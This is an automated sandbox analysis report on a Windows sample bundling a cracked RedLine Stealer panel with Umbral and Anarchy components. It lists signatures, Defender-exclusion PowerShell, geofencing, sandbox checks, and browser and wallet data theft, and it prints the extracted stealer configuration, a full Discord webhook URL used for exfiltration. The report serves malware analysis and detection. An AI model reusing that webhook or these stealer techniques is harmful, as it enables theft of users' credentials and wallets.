Analysis
-
max time kernel
122s -
max time network
106s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
19-05-2024 08:28
Static task
static1
URLScan task
urlscan1
General
Malware Config
Extracted
umbral
https://discordapp.com/api/webhooks/1186062061508239390/wfwPZiGPzytybpy8t2Hsp4XOI3B_k0QMNcH-OzuAphqi3y6_IFvyz8BsbHzw84brTS6o
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/memory/3448-317-0x0000000005EB0000-0x0000000005EF0000-memory.dmp family_umbral behavioral1/files/0x000700000002347f-316.dat family_umbral -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
resource yara_rule behavioral1/files/0x000700000002348a-247.dat family_redline behavioral1/memory/3448-263-0x0000000000E80000-0x0000000000F24000-memory.dmp family_redline behavioral1/memory/3448-313-0x0000000005C20000-0x0000000005C2E000-memory.dmp family_redline behavioral1/files/0x000700000002347e-312.dat family_redline -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4436 powershell.exe 4696 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation RedLine.MainPanel-cracked.exe Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation GERDA-Êðèïò â zip.exe -
Executes dropped EXE 7 IoCs
pid Process 936 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 5580 GERDA-Êðèïò â zip.exe 1408 Anarchy.exe 1884 Anarchy.exe 2120 rar.exe 2296 builder.exe -
Loads dropped DLL 45 IoCs
pid Process 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 3448 RedLine.MainPanel-cracked.exe 1884 Anarchy.exe 1884 Anarchy.exe 1884 Anarchy.exe 1884 Anarchy.exe 1884 Anarchy.exe 1884 Anarchy.exe 1884 Anarchy.exe 1884 Anarchy.exe 1884 Anarchy.exe 1884 Anarchy.exe 1884 Anarchy.exe 1884 Anarchy.exe 1884 Anarchy.exe 1884 Anarchy.exe 1884 Anarchy.exe 1884 Anarchy.exe 1884 Anarchy.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/1884-358-0x00007FFAA1610000-0x00007FFAA1BF9000-memory.dmp upx behavioral1/memory/1884-360-0x00007FFABB1A0000-0x00007FFABB1AF000-memory.dmp upx behavioral1/memory/1884-359-0x00007FFAB5510000-0x00007FFAB5533000-memory.dmp upx behavioral1/memory/1884-365-0x00007FFAB4C70000-0x00007FFAB4C9D000-memory.dmp upx behavioral1/memory/1884-366-0x00007FFAA3FB0000-0x00007FFAA3FC9000-memory.dmp upx behavioral1/memory/1884-368-0x00007FFAA32E0000-0x00007FFAA3457000-memory.dmp upx behavioral1/memory/1884-367-0x00007FFAA3460000-0x00007FFAA3483000-memory.dmp upx behavioral1/memory/1884-369-0x00007FFAA3E80000-0x00007FFAA3E99000-memory.dmp upx behavioral1/memory/1884-372-0x00007FFAA32A0000-0x00007FFAA32D3000-memory.dmp upx behavioral1/memory/1884-371-0x00007FFAB5B20000-0x00007FFAB5B2D000-memory.dmp upx behavioral1/memory/1884-370-0x00007FFAA1610000-0x00007FFAA1BF9000-memory.dmp upx behavioral1/memory/1884-373-0x00007FFAA2F90000-0x00007FFAA305D000-memory.dmp upx behavioral1/memory/1884-374-0x00007FFAA10F0000-0x00007FFAA1610000-memory.dmp upx behavioral1/memory/1884-377-0x00007FFAA3E10000-0x00007FFAA3E24000-memory.dmp upx behavioral1/memory/1884-378-0x00007FFAB57C0000-0x00007FFAB57CD000-memory.dmp upx behavioral1/memory/1884-376-0x00007FFAB5510000-0x00007FFAB5533000-memory.dmp upx behavioral1/memory/1884-379-0x00007FFAA2E70000-0x00007FFAA2F8C000-memory.dmp upx behavioral1/memory/1884-551-0x00007FFAA3460000-0x00007FFAA3483000-memory.dmp upx behavioral1/memory/1884-579-0x00007FFAA32E0000-0x00007FFAA3457000-memory.dmp upx behavioral1/memory/1884-580-0x00007FFAA1610000-0x00007FFAA1BF9000-memory.dmp upx behavioral1/memory/1884-595-0x00007FFAA3E80000-0x00007FFAA3E99000-memory.dmp upx behavioral1/memory/1884-590-0x00007FFAA2F90000-0x00007FFAA305D000-memory.dmp upx behavioral1/memory/1884-589-0x00007FFAA32A0000-0x00007FFAA32D3000-memory.dmp upx behavioral1/memory/1884-581-0x00007FFAB5510000-0x00007FFAB5533000-memory.dmp upx behavioral1/memory/1884-591-0x00007FFAA10F0000-0x00007FFAA1610000-memory.dmp upx behavioral1/memory/1884-626-0x00007FFAB5510000-0x00007FFAB5533000-memory.dmp upx behavioral1/memory/1884-625-0x00007FFABB1A0000-0x00007FFABB1AF000-memory.dmp upx behavioral1/memory/1884-620-0x00007FFAA2F90000-0x00007FFAA305D000-memory.dmp upx behavioral1/memory/1884-624-0x00007FFAA2E70000-0x00007FFAA2F8C000-memory.dmp upx behavioral1/memory/1884-634-0x00007FFAA1610000-0x00007FFAA1BF9000-memory.dmp upx behavioral1/memory/1884-632-0x00007FFAA3E80000-0x00007FFAA3E99000-memory.dmp upx behavioral1/memory/1884-633-0x00007FFAB5B20000-0x00007FFAB5B2D000-memory.dmp upx behavioral1/memory/1884-631-0x00007FFAA32A0000-0x00007FFAA32D3000-memory.dmp upx behavioral1/memory/1884-630-0x00007FFAA3460000-0x00007FFAA3483000-memory.dmp upx behavioral1/memory/1884-621-0x00007FFAA10F0000-0x00007FFAA1610000-memory.dmp upx behavioral1/memory/1884-629-0x00007FFAA3FB0000-0x00007FFAA3FC9000-memory.dmp upx behavioral1/memory/1884-628-0x00007FFAB4C70000-0x00007FFAB4C9D000-memory.dmp upx behavioral1/memory/1884-623-0x00007FFAB57C0000-0x00007FFAB57CD000-memory.dmp upx behavioral1/memory/1884-622-0x00007FFAA3E10000-0x00007FFAA3E24000-memory.dmp upx behavioral1/memory/1884-627-0x00007FFAA32E0000-0x00007FFAA3457000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 103 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3964 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 5684 tasklist.exe 1756 tasklist.exe 1804 tasklist.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 3692 systeminfo.exe -
Kills process with taskkill 7 IoCs
pid Process 3652 taskkill.exe 5320 taskkill.exe 1528 taskkill.exe 3384 taskkill.exe 3456 taskkill.exe 5520 taskkill.exe 3492 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133605809500464844" chrome.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 00000000ffffffff builder.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg builder.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0 = 8400310000000000b358bc431100444f574e4c4f7e3100006c0009000400efbe9a586d64b358bc432e00000074e101000000010000000000000000004200000000003ebe5a0044006f0077006e006c006f00610064007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370039003800000018000000 builder.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" builder.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" builder.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell builder.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" builder.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" builder.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" builder.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings builder.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0 builder.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\0\NodeSlot = "5" builder.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 builder.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\MRUListEx = 00000000ffffffff builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\0 = 5c0031000000000092572c7b10004c49425241527e310000440009000400efbeb358aa43b358bc432e00000025340200000008000000000000000000000000000000f2d410004c0069006200720061007200690065007300000018000000 builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 builder.exe Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" builder.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" builder.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 builder.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ chrome.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU builder.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0 builder.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags builder.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 builder.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 19002f433a5c000000000000000000000000000000000000000000 builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\MRUListEx = 00000000ffffffff builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\0\MRUListEx = ffffffff builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\MRUListEx = 00000000ffffffff builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0 = 7800310000000000b358653a10005245444c494e7e310000600009000400efbeb358aa43b358bc432e000000bb3302000000120000000000000000000000000000009fdc8a005200650064004c0069006e006500200053007400650061006c0065007200200043007200610063006b0065006400000018000000 builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 builder.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0 builder.exe Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" builder.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" builder.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 = 78003100000000009a586d641100557365727300640009000400efbe874f7748b358a3432e000000c70500000000010000000000000000003a000000000080152e0155007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0 = 50003100000000009a58f36c100041646d696e003c0009000400efbe9a586d64b358a3432e0000006ce1010000000100000000000000000000000000000096ccd600410064006d0069006e00000014000000 builder.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" builder.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\MRUListEx = 00000000ffffffff builder.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ builder.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" builder.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" builder.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" builder.exe Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" builder.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg builder.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff builder.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\0 builder.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 builder.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ builder.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0000000001000000ffffffff builder.exe Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" builder.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" builder.exe Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" builder.exe Set value (data) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff builder.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4780 chrome.exe 4780 chrome.exe 4436 powershell.exe 4436 powershell.exe 3264 powershell.exe 3264 powershell.exe 4436 powershell.exe 3264 powershell.exe 1740 powershell.exe 1740 powershell.exe 4696 powershell.exe 4696 powershell.exe 4696 powershell.exe 1740 powershell.exe 4780 chrome.exe 4780 chrome.exe 1496 powershell.exe 1496 powershell.exe 1496 powershell.exe 1916 powershell.exe 1916 powershell.exe 1916 powershell.exe 936 powershell.exe 936 powershell.exe 936 powershell.exe 3428 powershell.exe 3428 powershell.exe 3428 powershell.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe 4600 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 1056 7zFM.exe 2296 builder.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe 4780 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeRestorePrivilege 5096 7zG.exe Token: 35 5096 7zG.exe Token: SeSecurityPrivilege 5096 7zG.exe Token: SeSecurityPrivilege 5096 7zG.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe Token: SeShutdownPrivilege 4780 chrome.exe Token: SeCreatePagefilePrivilege 4780 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
